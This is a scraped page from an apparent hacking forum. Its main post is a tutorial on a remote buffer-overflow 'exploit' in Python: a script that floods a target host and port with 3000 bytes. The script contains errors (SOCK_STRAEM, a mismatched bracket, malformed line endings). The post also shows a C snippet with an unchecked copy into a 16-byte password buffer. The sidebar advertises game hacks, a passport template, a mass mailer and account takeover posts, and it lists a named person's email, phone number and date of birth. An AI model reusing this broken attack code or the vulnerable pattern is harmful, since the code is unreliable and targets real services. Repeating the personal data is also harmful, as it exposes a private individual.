www.i4info.org

i4info Provides the best hacking Material. Latest hacking tutorials and tools are available here. It is the best place for hackers.

Latest topics

» Teen Patti Gold Hack & 3 Patti Chips Code Extra Bonus 2016
Sun Jan 15, 2017 10:13 pm by printexpk1

» SQL Dumper v.8.0
Fri Jan 13, 2017 10:18 pm by imsopickled

» Infographic Resume/CV Pack
Fri Jan 06, 2017 2:55 pm by Admin

» My Dear Love
Tue Jan 03, 2017 2:24 pm by Admin

» 2017 Calendar | One Page Calendar
Sun Jan 01, 2017 9:03 am by Admin

» Diagnosing Traffic Drops Using Google Analytics
Fri Dec 30, 2016 11:59 am by Admin

» British/UK Passport PSD
Thu Dec 29, 2016 4:03 pm by Admin

» PHP Mailer - Mass Emails All in inbox 2017
Thu Dec 29, 2016 3:55 pm by Admin

» How to Close any Facebook Account?
Wed Dec 28, 2016 10:51 am by Admin

January 2017

MonTueWedThuFriSatSun
      1
2345678
9101112131415
16171819202122
23242526272829
3031     

Calendar Calendar

Affiliates


free forum

Forumotion on Facebook Forumotion on Twitter Forumotion on YouTubeForumotion on Google+

Visitors Counter


Flag Counter

About Author

Muhammad Shahroze Rashid
i4info
Web Developer
Web Developer & Designer,Researcher and Technical writer. An Information Security Consultant and System Auditor, a keen Security researcher.
samanabad
lahore, Punjab
54000
Pakistan
shahrozerashid007@gmail.com
03064904829
DOB: 05/25/1992
Muhammad Shahroze Rashid
Muhammad Shahroze Rashid is a Web Developer and Designer, Android Developer, InfoGrapher, IT consultant and Researcher
Reviewed by Google
Google
Date published: 01/19/2016
9 / 10 stars
Muhammad Shahroze Rashid
Muhammad Shahroze Rashid Web Developer & Designer,Researcher and Technical writer. An Information Security Consultant and System Audito
samanabad
lahore
Punjab
54000
Pakistan

How to exploit remote buffer overflow with python

Share

Admin
Admin

Posts : 469
Reputation : 6
Join date : 2014-12-10
Age : 24
Location : Pakistan
20160924

How to exploit remote buffer overflow with python

Post by Admin

In this article we are going to perform the exploit overflowing the buffer from the client part of the computer.

Step by Step Coding Remote Buffer Overflow Exploit with Python:


for carg in sys.argv:

            if carg == “-s”:

                        argnum = sys.argv.index(carg)

                        argnum += 1

                        host = sys.argv[argnum]

            elif carg == “-p”:

                        argnum = sys.argv.index(carg)

                        argnum += 1

                        port = sys.argv[argnum[

buffer = “\x41″* 3000

s = socket.socket(socket.AF_INET, socket.SOCK_STRAEM)

s.connect((host,port))

s.send(“USV ” + buffer + “//r//n//r”)

s.close()

Code should look like this:

buffer_overflow_exp1

Now, lets analyze the code. We already know the argument indentification script from my previous tutorial.  The second line makes a buffer, that is \x41 multiplied 3000 times. Then we see the lines of declaring s as socket, connecting with it, sending the buffer and closing the socket. Looks pretty hard, but it isnt.

After you have done these steps above, its time to test out our script!

buffer_overflow_exp2

This depends on programming language. As example, on C, you can be vulnerable to remote buffer overflow if you use code like this:

int authed = 0;
char password_buffer[16];
strcopy(password_buffer, your_password)
if (strcmp(password_buffer, password) == 0) {
authed = 1;
}
else {
authed = 0;
}

So, once the your_password is over 16, you can implement auth overflow, or if there are even more, you can get buffer overflow with segmentation fault error.

Take your time to comment on this article.
Share this post on: Excite BookmarksDiggRedditDel.icio.usGoogleLiveSlashdotNetscapeTechnoratiStumbleUponNewsvineFurlYahooSmarking


    Current date/time is Tue Jan 24, 2017 12:09 am